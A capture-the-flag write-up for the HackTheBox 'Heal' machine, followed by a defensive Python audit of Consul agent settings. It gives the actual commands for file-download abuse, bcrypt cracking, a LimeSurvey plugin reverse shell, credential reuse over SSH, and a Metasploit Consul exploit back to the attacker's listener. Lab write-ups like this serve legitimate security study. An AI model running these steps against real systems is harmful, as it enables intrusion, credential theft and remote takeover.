- Difficulty: Easy
- Target: HackTheBox [Heal]
- Type: Comprehensive Penetration
## GetShell
First, obtain the IP, scan the ports, and find that 80 and 22 are open.
Port 80 redirects to http://heal.htb, a site for filling out a questionnaire. Browsing the page shows requests going to http://api.heal.htb and http://take-survey.heal.htb; that is all the asset information available.
Testing the functionality revealed an arbitrary file download in the PDF export section.
Two users were found: ron and ralph.
It had also been noted earlier that api.heal.htb runs on the Ruby on Rails web framework. Per the official documentation, the database configuration file lives at config/database.yml.
Exploiting the vulnerability further, the database configuration was retrieved.
It is an SQLite database, so the database file storage/development.sqlite3 can be downloaded directly the same way.
Opening the database reveals user information, including the password hash of the ralph user. Use hashid to identify the hash type.
```
echo '$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG' | hashid
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
```
It is bcrypt, which is very slow to crack, but this box is lenient: the hash falls to a small wordlist, with no need for rockyou.
```
hashcat -m 3200 test.hash password.txt --show
$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG:147258369
```
The classic 147258369.
Access http://take-survey.heal.htb/index.php/admin, log in to the backend with the account ralph and password 147258369, and then it's the familiar backend GetShell phase.
An RCE PoC was found on GitHub, but its exploit.py cannot be run as-is and needs to be modified by hand.
First, download Y1LD1R1M.zip, unzip it, and then modify the config.xml file inside.
```xml
<compatibility>
<version>3.0</version>
<version>4.0</version>
<version>5.0</version>
<version>6.0</version>
<version>7.0</version>
<version>8.0</version>
</compatibility>
```
Add a few version lines so the plugin is reported as compatible; without this change the import fails because the plugin version is too old.
Also edit php-rev.php, changing the IP and port to those of your own reverse-shell listener.
After the changes, repack it into a zip and upload the archive in the Plugins configuration section. Start nc listening, then access this address:
http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-rev.php
Successfully obtained a reverse shell as the www-data user and checked the LimeSurvey configuration information.
```
cat /var/www/limesurvey/application/config/config.php
array(
'connectionString' => 'pgsql:host=localhost;port=5432;user=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey;',
'emulatePrepare' => true,
'username' => 'db_user',
'password' => 'AdmiDi0_pA$$w0rd',
'charset' => 'utf8',
'tablePrefix' => 'lime_',
)
```
Trying this password against the SSH user ron logs in successfully (password reuse) and gives a user shell.
## Privilege Escalation
Use ss to list the listening ports.
```
ss -tulnp
```
Many ports are open, so they had to be tested one by one; port 8500 turned out to host a web service. Forward it over SSH:
```
sshpass -p 'AdmiDi0_pA$$w0rd' ssh -L 8000:127.0.0.1:8500 [email protected] -N
```
It is a Consul service, and a Google search turned up an RCE. First, open http://localhost:8000/v1/agent/self and verify that the EnableRemoteScriptChecks option is true. If it is, the vulnerability is very likely present, so we can go straight to MSF.
```
msfconsole
use exploit/multi/misc/consul_service_exec
set RHOSTS 127.0.0.1
set RPORT 8000
set LHOST 10.10.14.53
run
```
Successfully popped a shell and obtained the root flag.
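As an added defensive counterpart to the EnableRemoteScriptChecks check above (this is not from the original write-up), here is a small audit that reads a Consul agent's /v1/agent/self JSON and flags the settings that made this box exploitable. The key names under DebugConfig and the HTTPAddrs format are assumptions, and the JSON sample is constructed.

```python
"""Audit a Consul agent's /v1/agent/self response for script-check exposure."""
import json

# Constructed stand-in for /v1/agent/self: only the keys the audit reads are
# present, and their names/location under DebugConfig are assumed.
SAMPLE_AGENT_SELF = json.dumps({
    "Config": {"Datacenter": "dc1", "NodeName": "example-node"},
    "DebugConfig": {
        "EnableRemoteScriptChecks": True,
        "EnableLocalScriptChecks": False,
        "ACLsEnabled": False,
        "HTTPAddrs": ["tcp://127.0.0.1:8500"],
    },
})


def find_key(obj, key):
    """Depth-first search for `key` anywhere in the nested response (the exact
    nesting differs between Consul versions). Returns None if the key is absent."""
    if isinstance(obj, dict):
        if key in obj:
            return obj[key]
        children = obj.values()
    elif isinstance(obj, list):
        children = obj
    else:
        return None
    for child in children:
        hit = find_key(child, key)
        if hit is not None:
            return hit
    return None


def audit_agent_self(raw_json):
    """Return a list of findings; an empty list means nothing was flagged."""
    data = json.loads(raw_json)
    findings = []
    if find_key(data, "EnableRemoteScriptChecks") is True:
        findings.append("EnableRemoteScriptChecks=true: checks registered over the "
                        "HTTP API run commands on the host; set it to false")
    if find_key(data, "EnableLocalScriptChecks") is True:
        findings.append("EnableLocalScriptChecks=true: script checks from local config "
                        "files execute; prefer HTTP/TCP checks")
    if find_key(data, "ACLsEnabled") is False:
        findings.append("ACLs disabled: the HTTP API accepts unauthenticated writes; "
                        "enable ACLs with default_policy = \"deny\"")
    for addr in find_key(data, "HTTPAddrs") or []:
        if addr.startswith("unix://"):
            continue  # unix sockets are governed by file permissions, not the network
        host = addr.split("://")[-1].rsplit(":", 1)[0]
        if host not in ("127.0.0.1", "localhost", "[::1]"):
            findings.append(f"HTTP API bound to {host}: reachable beyond loopback")
    return findings
```

On this box the HTTP API listened on loopback only, which is why the SSH port-forward was needed; the audit reports that binding as fine and flags the script-check and ACL settings.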